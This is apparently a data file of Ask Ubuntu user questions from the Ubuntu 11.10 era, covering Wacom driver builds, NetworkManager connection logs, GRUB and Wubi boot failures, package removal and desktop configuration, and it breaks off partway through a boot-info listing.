103283	wacom bamboo pen ctl 470 not working in 11.10	i have an hp dv laptop running ubuntu 11.10 and gnome 3 de . i 've gone through a couple of posts here and followed the instructions given in this thread on ubuntu forums - http : //ubuntuforums.org/showthread.php ? t=1515562 this is the instruction given in the troubleshooting part of the thread ( because nothing else worked for me ) cd desktop git clone git : //linuxwacom.git.sourceforge.net/gitroot/linuxwacom/input-wacom sudo apt-get update sudo apt-get install build-essential libx11-dev libxi-dev x11proto-input-dev xserver-xorg-dev libxrandr-dev libncurses5-dev autoconf libtool sudo apt-get upgrade uname -r ( if you have the generic kernel which most do . ) sudo apt-get install linux-headers-generic ( if you have the rt or pae kernel . ) sudo apt-get install linux-headers-rt or sudo apt-get install linux-headers-generic-pae cd input-wacom ./autogen.sh -- prefix=/usr ( if you are in lucid or maverick . ) sudo cp ./2.6.30/wacom.ko /lib/modules/`uname -r`/kernel/drivers/input/tablet/wacom.ko or ( if you are in natty or oneiric . ) sudo cp ./2.6.38/wacom.ko /lib/modules/`uname -r`/kernel/drivers/input/tablet/wacom.ko sudo depmod -a i just ca n't get the sudo depmod -a part given in the instructions to work . when i do that , my output is like this - gaya3 @ kikyo : ~/desktop/input-wacom $ sudo cp 2.6.38/wacom.ko /lib/modules/3.0.0-15-generic/kernel/drivers/input/tablet gaya3 @ kikyo : ~/desktop/input-wacom $ sudo depmod -a warning : ca n't read module /lib/modules/3.0.0-15-generic/kernel/drivers/input/tablet/wacom.ko.gz : exec format error gaya3 @ kikyo : ~/desktop/input-wacom $ also , my tab is detected as shown by running lsusb gaya3 @ kikyo : ~ $ lsusb bus 002 device 008 : id 056a:00dd wacom co. , ltd i do n't know whether i messed up by doing the instructions over and over again . = (
103284	xrdp : notify local user when a remote client is connected	i 'm using xrdp on a xubuntu 11.10 machine , and successfully using remmina to connect to it through the internet , from another xubuntu machine . i would like to know , on the `` server '' machine , when a client has estabilished a connection . i could n't find a way to do this in xrdp itself , so i thought about making a basic script using either zenity or notify-osd , but i do n't know how i can launch it when a new rdp connection is created . is there any way to trigger the notification ?
103290	how to implement location awareness	is there any way i can make my laptop running kubuntu a bit more intelligent as to where it is ? i imagine this being done by detecting what wifi connections are around , or even just what wifi/wired network it 's connected to and then being able to start/stop programs , run scripts etc . but really i do n't mind how it 's done . is there any way ( program / script ) i can implement this behaviour ?
103294	does the intel 320 ssd work out-of-the-box ?	i am a non-techie person , so i will ask my question in plain english : i have a thinkpad t510 with a sata ii , 3 gb interface . i am thinking about a new drive and installing a 12.04 iso in april . the ssd i am thinking about is an intel 320 series 160 gb . can anyone tell me if this will work `` out-of-the-box '' or are there umpteen different code/terminal related things i will have to do ? am i better off staying with a hdd ?
103296	can i remove some packages with one command ?	i want to remove all apache packages from my system ( as i am transitioning to lighttpd ) . i have these installed : monkey @ debvirtual : /etc/php5dpkg -- get-selections | grep apachee ] apache2-doc install apache2-mpm-itk install apache2-utils install apache2.2-bin deinstall apache2.2-common install libapache2-mod-dnssd install libapache2-mod-perl2 deinstall libapache2-mod-php5 install libapache2-mod-python install ` monkey @ debvirtual : /etc/php5 $ whereis apache2 apache2 : /usr/sbin/apache2 /etc/apache2 /usr/lib/apache2 /usr/lib64/apache2 /usr/share/apache2 /usr/share/man/man8/apache2.8.gz i would like to use one dpkg ( or other ) command to remove ( totally from my system ) all apache packages .
103298	ruby ri : nothing known about array	there does n't seem to be any ri documentation on core ruby classes on my system . using ri -c i see that there are docs for a few gems i 've installed , but that 's it . $ ri array nothing known about array i 'm using the standard system ruby1.8 ( 1.8.7.352-2 ) . i 'm not using rvm . is there some other package i need to install ? on a very similar machine ( also oneiric with ruby 1.8 ) ri array works just fine , and i ca n't tell what the difference is . ruby -v on the problematic machine : ruby 1.8.7 ( 2011-06-30 patchlevel 352 ) [ i686-linux ] and on the normal machine : ruby 1.8.7 ( 2011-06-30 patchlevel 352 ) [ x86_64-linux ]
103308	minecraft becomes blank after loading	i have minecraft installed but whenever i open it , it shows the login screen , so i login , and then when i click login , the window turns black . when i tried to play in in browser , the same thing happened except the window turned whit . please help guys ! i feel like i 've tried everything ! thanks ! = ) oh and if you want a better look at the problem , i 've created this video that is a recording of my desktop and shows what happens when i try to run minecraft . http : //www.youtube.com/watch ? v=8cmsnwoubei
103312	my system does n't go shutdown	sometimes my system does n't go shutdown when i click at this element of menu . if i run `` sudo halt '' , system freezes at the splash screen . why ? what can i do to solve this problem ? thank you . sorry for wrong english .
103313	changing runlevel : init or telinit ?	i 've been looking on the internet for an answer and have n't found a concrete one . if i want to change the runlevel it is okay to use just init or do i always have to call it through telinit . i 've read that telinit is in fact a symlink to init . if this is correct , can i use them interchangeably ?
103317	nvidia dual displays not being detected	i just installed ubuntu for the first time , downloaded 11.04 and updated to 11.10 . i have a setup with a nvidia 7600gt graphics card , with dvi-out and vga-out . i have two displays connected to those plugs , and they work perfectly on windows . i updated to nvidia 's latest driver with : sudo add-apt-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get install nvidia-current and i still ca n't get ubuntu to recognize i have two displays ... can someone help me please ?
103320	install packages from newer release without building ( apt pinning )	i need these packages with the latest upstream version backported for ubuntu/natty libccid_1.4.5-0ubuntu1_amd64.deb libpcsclite1_1.8.1-0ubuntu1_amd64.deb libpcsclite-dev_1.8.1-0ubuntu1_amd64.deb libusb-1.0-0_1.0.9-0ubuntu1_amd64.deb libusb-1.0-0-dev_1.0.9-0ubuntu1_amd64.deb opensc_0.12.2-1ubuntu1ppa1~natty1_amd64.deb pcscd_1.8.1-0ubuntu1_amd64.deb pcsc-tools_1.4.18-0ubuntu1_amd64.deb i tried to build them from source with update but it failed . i am not an expert at packaging and there are so many tutorials and receipt out there . do you know a good and up to date tutorial for backporting ubuntu packages ? how do i get packages from other releases without having to build them myself ?
103321	installing vnc with resumable sessions	i 'm coming from fedora , where there 's a useful package called `` vnc-ltsp-config '' , which installs vnc so that it functions just like a normal gnome desktop ( i.e . it provides a login prompt , and then starts a new session for your user ) . does ubuntu have anything similar to this ? the normal vnc package appears to operate via the unuseful default , where you can only login to an existing desktop . how do you configure ubuntu to create a new session when someone logs in via vnc ?
103322	i have an issue with grub - minimal bash like	i am an a level student and for the fourth time in a row , i have experience grub when booting . i have lost all of my work and have had to get class notes off of a friend . i do not expect this to happen as my future depends on the grades i get . i installed 11.10 using wubi installer and i am yet to find a solution to this problem .
103323	can not install samba ?	i have tried installing samba using these commands : sudo apt-get install samba smbfs , sudo apt-get install samba , sudo apt-get install samba4 , sudo apt-get install samba smbclient , but it will not install ? it tells me that is missing , obsolete or only available from another source ? please take it easy one me as i am a first time user . any help would be greatly appreciated : )
103328	macbook pro/oneric multitouch support - how to i configure multitouch actions ?	i have switched my macbook pro 5.1 over to ubuntu , because os x lion was dragging its heels on the 2.5-year-old hardware ( sickeningly short old-hardware-support half-life ... grrr ) anyway , most of ubuntu is up and happy fine , but i want to be able to multitouch swipe my way around workspaces like you can in os x . now i know that ubuntu is detecting the three-finger swipe ( and indeed differentiating a 4-finger one ) because it 's configured to move the windows around the screen with that particular gesture . so , how do i hook into that event , the three finger swipe , and reassign the action to moving workspaces ? edit : so , trying alexandre 's suggestion below , i 've now got a problem with touchegg . i 've tried putting in a new section in xorg.conf as suggested here ( following instructions for the mbp 7.1 , ) but that makes this significantly worse - the clever velocity scaling goes , and the trackpad is far too responsive when just moving the cursor . the developer only provides documentation for 10.10 and 11.04 , and the latter is supposed to be fully working and `` automatic '' - these were the instructions for 10.10 . in addition i 've noticed , by running touchegg in the shell instead of a startup daemon , that it only detects 2-finger motion ( both with and without the xorg hack ) no higher multitouch gestures . this is all very puzzling because , as i said , three finger gestures work , with a compiz animation ( moving a non-maximised window ) . i guess it ca n't be a missing kernel module or something , since it works sometimes , so could compiz be swallowing all the events ? if so , how would i test ? edit2 : i 've tested unity 2d vs 3d ( which seems to be how you disable compiz ) and partial success . with compiz disabled touchegg can see all the multitouch events of the rainbow . however , it ca n't seem to run anything other than the `` nautilus drag window '' event with the three finger gesture - this implies to me that nautilus is hooking into this event a bit too low down for me to get at ! i 'm marking alexandre 's answer correct , since touchegg is one way to do this within the scope of the original question . i may post a more specific question later when i 've figured out how to get this working exactly as i want !
103329	how to calculate network bandwidth , disk space , processing power and memory of a msg	i need to calculate the network bandwidth , disk space , processing power and memory of some messages that i exchanged between two computers ( sender and receiver ) . for example if the message is `` i am working for three ( 3 ) hours '' how much network bandwidth will it use ? how much disk space will be used ? how much processing power will be utilize at the sender and the receiving end ? how much disk space will be used at both the ends ? if i will send this message 10 , 100 , or 1000 times . thanks for your guidance .
103335	i ca n't connect to my wireless router even though i was able to do that few days ago . i get errors about duplicate ipv6	feb 11 18:09:12 olga-k54c networkmanager [ 5191 ] : < info > activation ( wlan0 ) starting connection 'corpse' feb 11 18:09:12 olga-k54c networkmanager [ 5191 ] : < info > ( wlan0 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] feb 11 18:09:12 olga-k54c networkmanager [ 5191 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) scheduled ... feb 11 18:09:12 olga-k54c networkmanager [ 5191 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) started ... feb 11 18:09:12 olga-k54c networkmanager [ 5191 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) scheduled ... feb 11 18:09:12 olga-k54c networkmanager [ 5191 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) complete . feb 11 18:09:12 olga-k54c networkmanager [ 5191 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) starting ... feb 11 18:09:12 olga-k54c networkmanager [ 5191 ] : < info > ( wlan0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] feb 11 18:09:12 olga-k54c networkmanager [ 5191 ] : < info > activation ( wlan0/wireless ) : access point 'corpse ' has security , but secrets are required . feb 11 18:09:12 olga-k54c networkmanager [ 5191 ] : < info > ( wlan0 ) : device state change : config - > need-auth ( reason 'none ' ) [ 50 60 0 ] feb 11 18:09:12 olga-k54c networkmanager [ 5191 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) complete . feb 11 18:09:12 olga-k54c networkmanager [ 5191 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) scheduled ... feb 11 18:09:12 olga-k54c networkmanager [ 5191 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) started ... feb 11 18:09:12 olga-k54c networkmanager [ 5191 ] : < info > ( wlan0 ) : device state change : need-auth - > prepare ( reason 'none ' ) [ 60 40 0 ] feb 11 18:09:12 olga-k54c networkmanager [ 5191 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) scheduled ... feb 11 18:09:12 olga-k54c networkmanager [ 5191 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) complete . feb 11 18:09:12 olga-k54c networkmanager [ 5191 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) starting ... feb 11 18:09:12 olga-k54c networkmanager [ 5191 ] : < info > ( wlan0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] feb 11 18:09:12 olga-k54c networkmanager [ 5191 ] : < info > activation ( wlan0/wireless ) : connection 'corpse ' has security , and secrets exist . no new secrets needed . feb 11 18:09:12 olga-k54c networkmanager [ 5191 ] : < info > config : added 'ssid ' value 'corpse' feb 11 18:09:12 olga-k54c networkmanager [ 5191 ] : < info > config : added 'scan_ssid ' value '1' feb 11 18:09:12 olga-k54c networkmanager [ 5191 ] : < info > config : added 'key_mgmt ' value 'wpa-psk' feb 11 18:09:12 olga-k54c networkmanager [ 5191 ] : < info > config : added 'psk ' value ' < omitted > ' feb 11 18:09:12 olga-k54c networkmanager [ 5191 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) complete . feb 11 18:09:12 olga-k54c networkmanager [ 5191 ] : < info > config : set interface ap_scan to 1 feb 11 18:09:13 olga-k54c networkmanager [ 5191 ] : < info > ( wlan0 ) : supplicant interface state : disconnected - > scanning feb 11 18:09:19 olga-k54c wpa_supplicant [ 902 ] : trying to authenticate with 14 : da : e9 : ba : ba : a4 ( ssid='corpse ' freq=2412 mhz ) feb 11 18:09:19 olga-k54c networkmanager [ 5191 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > authenticating feb 11 18:09:19 olga-k54c kernel : [ 3178.022135 ] wlan0 : authenticate with 14 : da : e9 : ba : ba : a4 ( try 1 ) feb 11 18:09:19 olga-k54c kernel : [ 3178.024310 ] wlan0 : authenticated feb 11 18:09:19 olga-k54c wpa_supplicant [ 902 ] : trying to associate with 14 : da : e9 : ba : ba : a4 ( ssid='corpse ' freq=2412 mhz ) feb 11 18:09:19 olga-k54c networkmanager [ 5191 ] : < info > ( wlan0 ) : supplicant interface state : authenticating - > associating feb 11 18:09:19 olga-k54c kernel : [ 3178.043509 ] wlan0 : associate with 14 : da : e9 : ba : ba : a4 ( try 1 ) feb 11 18:09:19 olga-k54c wpa_supplicant [ 902 ] : associated with 14 : da : e9 : ba : ba : a4 feb 11 18:09:19 olga-k54c kernel : [ 3178.047714 ] wlan0 : rx reassocresp from 14 : da : e9 : ba : ba : a4 ( capab=0x411 status=0 aid=2 ) feb 11 18:09:19 olga-k54c kernel : [ 3178.047726 ] wlan0 : associated feb 11 18:09:19 olga-k54c kernel : [ 3178.048373 ] cfg80211 : calling crda for country : ru feb 11 18:09:19 olga-k54c networkmanager [ 5191 ] : < info > ( wlan0 ) : supplicant interface state : associating - > associated feb 11 18:09:19 olga-k54c kernel : [ 3178.053443 ] cfg80211 : updating information on frequency 2412 mhz for a 20 mhz width channel with regulatory rule : feb 11 18:09:19 olga-k54c kernel : [ 3178.053449 ] cfg80211 : 2402000 khz - 2482000 khz @ khz ) , ( n/a mbi , 2000 mbm ) feb 11 18:09:19 olga-k54c kernel : [ 3178.053452 ] cfg80211 : updating information on frequency 2417 mhz for a 20 mhz width channel with regulatory rule : feb 11 18:09:19 olga-k54c kernel : [ 3178.053455 ] cfg80211 : 2402000 khz - 2482000 khz @ khz ) , ( n/a mbi , 2000 mbm ) feb 11 18:09:19 olga-k54c kernel : [ 3178.053458 ] cfg80211 : updating information on frequency 2422 mhz for a 20 mhz width channel with regulatory rule : feb 11 18:09:19 olga-k54c kernel : [ 3178.053462 ] cfg80211 : 2402000 khz - 2482000 khz @ khz ) , ( n/a mbi , 2000 mbm ) feb 11 18:09:19 olga-k54c kernel : [ 3178.053464 ] cfg80211 : updating information on frequency 2427 mhz for a 20 mhz width channel with regulatory rule : feb 11 18:09:19 olga-k54c kernel : [ 3178.053468 ] cfg80211 : 2402000 khz - 2482000 khz @ khz ) , ( n/a mbi , 2000 mbm ) feb 11 18:09:19 olga-k54c kernel : [ 3178.053470 ] cfg80211 : updating information on frequency 2432 mhz for a 20 mhz width channel with regulatory rule : feb 11 18:09:19 olga-k54c kernel : [ 3178.053474 ] cfg80211 : 2402000 khz - 2482000 khz @ khz ) , ( n/a mbi , 2000 mbm ) feb 11 18:09:19 olga-k54c kernel : [ 3178.053477 ] cfg80211 : updating information on frequency 2437 mhz for a 20 mhz width channel with regulatory rule : feb 11 18:09:19 olga-k54c kernel : [ 3178.053480 ] cfg80211 : 2402000 khz - 2482000 khz @ khz ) , ( n/a mbi , 2000 mbm ) feb 11 18:09:19 olga-k54c kernel : [ 3178.053483 ] cfg80211 : updating information on frequency 2442 mhz for a 20 mhz width channel with regulatory rule : feb 11 18:09:19 olga-k54c kernel : [ 3178.053486 ] cfg80211 : 2402000 khz - 2482000 khz @ khz ) , ( n/a mbi , 2000 mbm ) feb 11 18:09:19 olga-k54c kernel : [ 3178.053489 ] cfg80211 : updating information on frequency 2447 mhz for a 20 mhz width channel with regulatory rule : feb 11 18:09:19 olga-k54c kernel : [ 3178.053492 ] cfg80211 : 2402000 khz - 2482000 khz @ khz ) , ( n/a mbi , 2000 mbm ) feb 11 18:09:19 olga-k54c kernel : [ 3178.053495 ] cfg80211 : updating information on frequency 2452 mhz for a 20 mhz width channel with regulatory rule : feb 11 18:09:19 olga-k54c kernel : [ 3178.053498 ] cfg80211 : 2402000 khz - 2482000 khz @ khz ) , ( n/a mbi , 2000 mbm ) f eb 11 18:09:19 olga-k54c kernel : [ 3178.053501 ] cfg80211 : updating information on frequency 2457 mhz for a 20 mhz width channel with regulatory rule : feb 11 18:09:19 olga-k54c kernel : [ 3178.053504 ] cfg80211 : 2402000 khz - 2482000 khz @ khz ) , ( n/a mbi , 2000 mbm ) feb 11 18:09:19 olga-k54c kernel : [ 3178.053507 ] cfg80211 : updating information on frequency 2462 mhz for a 20 mhz width channel with regulatory rule : feb 11 18:09:19 olga-k54c kernel : [ 3178.053510 ] cfg80211 : 2402000 khz - 2482000 khz @ khz ) , ( n/a mbi , 2000 mbm ) feb 11 18:09:19 olga-k54c kernel : [ 3178.053513 ] cfg80211 : updating information on frequency 2467 mhz for a 20 mhz width channel with regulatory rule : feb 11 18:09:19 olga-k54c kernel : [ 3178.053516 ] cfg80211 : 2402000 khz - 2482000 khz @ khz ) , ( n/a mbi , 2000 mbm ) feb 11 18:09:19 olga-k54c kernel : [ 3178.053519 ] cfg80211 : updating information on frequency 2472 mhz for a 20 mhz width channel with regulatory rule : feb 11 18:09:19 olga-k54c kernel : [ 3178.053523 ] cfg80211 : 2402000 khz - 2482000 khz @ khz ) , ( n/a mbi , 2000 mbm ) feb 11 18:09:19 olga-k54c kernel : [ 3178.053525 ] cfg80211 : disabling freq 2484 mhz feb 11 18:09:19 olga-k54c kernel : [ 3178.053531 ] cfg80211 : regulatory domain changed to country : ru feb 11 18:09:19 olga-k54c kernel : [ 3178.053533 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) feb 11 18:09:19 olga-k54c kernel : [ 3178.053537 ] cfg80211 : ( 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) feb 11 18:09:19 olga-k54c kernel : [ 3178.053540 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 20000 khz ) , ( n/a , 3000 mbm ) feb 11 18:09:20 olga-k54c networkmanager [ 5191 ] : < info > ( wlan0 ) : supplicant interface state : associated - > 4-way handshake feb 11 18:09:20 olga-k54c wpa_supplicant [ 902 ] : wpa : key negotiation completed with 14 : da : e9 : ba : ba : a4 [ ptk=tkip gtk=tkip ] feb 11 18:09:20 olga-k54c wpa_supplicant [ 902 ] : ctrl-event-connected - connection to 14 : da : e9 : ba : ba : a4 completed ( reauth ) [ id=0 id_str= ] feb 11 18:09:20 olga-k54c networkmanager [ 5191 ] : < info > ( wlan0 ) : supplicant interface state : 4-way handshake - > completed feb 11 18:09:20 olga-k54c networkmanager [ 5191 ] : < info > activation ( wlan0/wireless ) stage 2 of 5 ( device configure ) successful . connected to wireless network 'corpse ' . feb 11 18:09:20 olga-k54c networkmanager [ 5191 ] : < info > activation ( wlan0 ) stage 3 of 5 ( ip configure start ) scheduled . feb 11 18:09:20 olga-k54c networkmanager [ 5191 ] : < info > activation ( wlan0 ) stage 3 of 5 ( ip configure start ) started ... feb 11 18:09:20 olga-k54c networkmanager [ 5191 ] : < info > ( wlan0 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] feb 11 18:09:20 olga-k54c networkmanager [ 5191 ] : < info > activation ( wlan0 ) beginning dhcpv4 transaction ( timeout in 45 seconds ) feb 11 18:09:20 olga-k54c networkmanager [ 5191 ] : < info > dhclient started with pid 5806 feb 11 18:09:20 olga-k54c networkmanager [ 5191 ] : < info > activation ( wlan0 ) beginning ip6 addrconf . feb 11 18:09:20 olga-k54c networkmanager [ 5191 ] : < info > activation ( wlan0 ) stage 3 of 5 ( ip configure start ) complete . feb 11 18:09:20 olga-k54c dhclient : internet systems consortium dhcp client 4.1.1-p1 feb 11 18:09:20 olga-k54c dhclient : copyright 2004-2010 internet systems consortium . feb 11 18:09:20 olga-k54c dhclient : all rights reserved . feb 11 18:09:20 olga-k54c dhclient : for info , please visit https : //www.isc.org/software/dhcp/ feb 11 18:09:20 olga-k54c dhclient : feb 11 18:09:20 olga-k54c kernel : [ 3178.319668 ] wlan0 : ipv6 duplicate address fe80 : :e6d5:3dff : fe58:6cd detected ! feb 11 18:09:20 olga-k54c networkmanager [ 5191 ] : < info > ( wlan0 ) : dhcpv4 state changed nbi - > preinit feb 11 18:09:20 olga-k54c dhclient : listening on lpf/wlan0/e4 : d5:3d:58:06 : cd feb 11 18:09:20 olga-k54c dhclient : sending on lpf/wlan0/e4 : d5:3d:58:06 : cd feb 11 18:09:20 olga-k54c dhclient : sending on socket/fallback feb 11 18:09:20 olga-k54c dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 3 feb 11 18:09:22 olga-k54c dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 8 feb 11 18:09:31 olga-k54c dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 8 feb 11 18:09:39 olga-k54c dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 13 feb 11 18:09:40 olga-k54c networkmanager [ 5191 ] : < info > ( wlan0 ) : ip6 addrconf timed out or failed . f eb 11 18:09:40 olga-k54c networkmanager [ 5191 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ip6 configure timeout ) scheduled ... feb 11 18:09:40 olga-k54c networkmanager [ 5191 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ip6 configure timeout ) started ... feb 11 18:09:40 olga-k54c networkmanager [ 5191 ] : < info > activation ( wlan0 ) stage 5 of 5 ( ip configure commit ) started ... feb 11 18:09:40 olga-k54c networkmanager [ 5191 ] : < info > activation ( wlan0 ) stage 5 of 5 ( ip configure commit ) failed ( no ip configuration found ) feb 11 18:09:40 olga-k54c networkmanager [ 5191 ] : < info > ( wlan0 ) : device state change : ip-config - > failed ( reason 'ip-config-unavailable ' ) [ 70 120 5 ] feb 11 18:09:40 olga-k54c networkmanager [ 5191 ] : < warn > activation ( wlan0 ) failed for access point ( corpse ) feb 11 18:09:40 olga-k54c networkmanager [ 5191 ] : < info > marking connection 'corpse ' invalid . feb 11 18:09:40 olga-k54c networkmanager [ 5191 ] : < warn > activation ( wlan0 ) failed . feb 11 18:09:40 olga-k54c networkmanager [ 5191 ] : < info > activation ( wlan0 ) stage 5 of 5 ( ip configure commit ) complete . feb 11 18:09:40 olga-k54c networkmanager [ 5191 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ip6 configure timeout ) complete . feb 11 18:09:40 olga-k54c networkmanager [ 5191 ] : < info > ( wlan0 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] feb 11 18:09:40 olga-k54c networkmanager [ 5191 ] : < info > ( wlan0 ) : deactivating device ( reason 'none ' ) [ 0 ] feb 11 18:09:40 olga-k54c networkmanager [ 5191 ] : < info > ( wlan0 ) : canceled dhcp transaction , dhcp client pid 5806 feb 11 18:09:40 olga-k54c kernel : [ 3198.359131 ] wlan0 : deauthenticating from 14 : da : e9 : ba : ba : a4 by local choice ( reason=3 ) feb 11 18:09:40 olga-k54c kernel : [ 3198.411144 ] cfg80211 : all devices are disconnected , going to restore regulatory settings feb 11 18:09:40 olga-k54c kernel : [ 3198.411158 ] cfg80211 : restoring regulatory settings feb 11 18:09:40 olga-k54c kernel : [ 3198.411179 ] cfg80211 : calling crda to update world regulatory domain feb 11 18:09:40 olga-k54c wpa_supplicant [ 902 ] : ctrl-event-disconnected bssid=00:00:00:00:00:00 reason=3 feb 11 18:09:40 olga-k54c networkmanager [ 5191 ] : < info > policy set 'wired connection 1 ' ( eth0 ) as default for ipv4 routing and dns . feb 11 18:09:40 olga-k54c networkmanager [ 5191 ] : < info > policy set 'wired connection 1 ' ( eth0 ) as default for ipv4 routing and dns . feb 11 18:09:40 olga-k54c kernel : [ 3198.421270 ] cfg80211 : ignoring regulatory request set by core since the driver uses its own custom regulatory domain feb 11 18:09:40 olga-k54c kernel : [ 3198.421280 ] cfg80211 : world regulatory domain updated : feb 11 18:09:40 olga-k54c kernel : [ 3198.421284 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) feb 11 18:09:40 olga-k54c kernel : [ 3198.421292 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) feb 11 18:09:40 olga-k54c kernel : [ 3198.421299 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) feb 11 18:09:40 olga-k54c kernel : [ 3198.421305 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) feb 11 18:09:40 olga-k54c kernel : [ 3198.421311 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) feb 11 18:09:40 olga-k54c kernel : [ 3198.421317 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) feb 11 18:09:40 olga-k54c networkmanager [ 5191 ] : < info > ( wlan0 ) : supplicant interface state : completed - > disconnected
103336	nautilus opens twice in classic gnome	environment : ubuntu 11.10 / 12.04 with classic gnome situation : choose nautilus of specific location problem : it looks like nautilus is opening 2 windows . after a while the second one dies . question : why and how to prevent that problem ?
103339	i ca n't boot after deleting the first ubuntu ?	i installed ubuntu 11.10 and after a while it get damaged and i install another one in another partition . after i boot to the new one i delete the old one ( i format its partition ) . when i restart i could n't boot . what is the solution ?
103343	how do rekonq 's vi shortcuts work ?	as a vim user , i was pleased to discover a checkbox in rekonq 's ( kubuntu 's web browser ) settings that enables vi-like shortcuts . however , checking it does n't seem to have any effect , at least with the shortcuts i know . i ca n't seem to find any documentation about this anywhere , in the help files or on google . what are these shortcuts , exactly , and how can i get them to work ?
103345	wubi - no root system file defined	i 've been trying to install ubuntu 11.04 on asus k50ij notebook . all via wubi went without problem . after a reboot , everything starts but during veryfying the installation , this error appears : '' no root system file defined '' i tried to run chkdsk because i thought there might be some hdd problems , yet nothing has been found .
103346	stunnel changes https pages to http when clicking a link	i have stunnel4 installed on ubuntu server 11.10 . i have apache installed from the repositories . i have some programs installed such as owncloud or sitebar . when i visit their web pages over the internet using addresses like https : //myserver.com/owncloud , if i then click on a link within the web page that appears , it takes me to a http address such as http : //myserver.com/owncloud/linkiclickedon and the page appears white . i have to always keep changing the urls to https . how can i correct this behaviour ? th site installed on the server is located at for example , http : //myserver/owncloud , but i am taking it through stunnel to give it some security when accessing it online .
103348	error when installing makefile : `` make : *** no targets specified and no makefile found . stop . ''	in short while i run the make command it says : nir @ nir : ~/downloads/xf86-video-intel-2.17.0 $ make make : *** no targets specified and no makefile found . stop . i looked inside the folder-xf86-video-intel-2.17.0 and there is a file named `` makefile.in '' it supposed to be a in file , right ?
103349	failed to retrieve share list from server	ubuntu 11.10 nautilus 3.2.1 we are able to see windows pcs on our network from ubuntu 's nautilus , yet we are not able to access their shares from nautilus , even though they work fine with each other , i.e . each windows pc is able access the other windows pc 's shares just fine . please infer from this information the answers to any questions about our situation you may have . note this is a default/pristine configuration , i.e . no changes have been made whatsoever . our version of ubuntu is : 11.10 , nautilus is 3.2.1 linux tite-hp-630-notebook-pc 3.0.0-15-generic # 26-ubuntu smp fri jan 20 17:23:00 utc 2012 x86_64 x86_64 x86_64 gnu/linux a screenshot is available upon request . thanks in advance for your assistance .
103350	how can i `` provide proper authorization '' to the kde software updates program ?	i just installed kde , and every time i run the software updates program it says : this operation can not continue since proper authorization was not provided . how can i get it to work ?
103351	how can i make the wubi installation partition bigger ?	i 'm on ubuntu 11.10 , i just want to make the wubi installation partition bigger . is there any way ? i use dual-boot with windows 7 .
103352	how do i disable the unity keyboard shortcut overlay ?	is it possible to disable keyboard shortcut overlay in ubuntu 12.04 ?
103358	how can i get kubuntu to respect previous window sizes ?	every time i open konsole , or any number of other programs , its y-size is 100 % of my desktop , which is a pain . i have the setting `` save size and position on exit '' checked , and i tried unchecking it then checking it again . i also tried lots of different ways to exit the program , but every time it still opens really big . how can i fix this ?
103359	11.10 dual boot no grub menu	i have installed windows 7 and then ubuntu 11.10 on my computer but no grub menu came up on reboot and it went straight into windows . i then removed the ubuntu created partitions and tried fedora 16 - it created slightly different partitions - which worked ( grub menu was shown ) . not wanting to keep fedora , i formatted it 's partition and installed ubuntu onto it . grub still loads but still with the fedora options ( which obviously do n't work ) . when i try to run boot-repair it warns me : '' the boot of your pc is in efi mode , but no efi partition was detected . you may want to retry after creating a efi partition ( fat32 , > 200mo , start of the disk , efi flag ) '' if i continue , i ca n't run the recommended fix as it keeps asking me to add software sources for grub2 even though they are there . boot info script 0.60-git [ 2 jan 2012 ] ============================= boot info summary : =============================== = > grub2 ( v1.99 ) is installed in the mbr of /dev/sda and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks for ( , msdos3 ) /grub2 on this drive . = > syslinux mbr ( 4.04 and higher ) is installed in the mbr of /dev/sdb . sda1 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : /bootmgr /boot/bcd sda2 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : windows 7 boot files : /windows/system32/winload.exe sda3 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : boot files : /grub2/grub.cfg /grub2/core.img sda4 : __________________________________________________________________________ file system : extended partition boot sector type : unknown boot sector info : sda5 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : ubuntu 11.10 boot files : /boot/grub/grub.cfg /etc/fstab sda6 : __________________________________________________________________________ file system : swap boot sector type : - boot sector info : sdb1 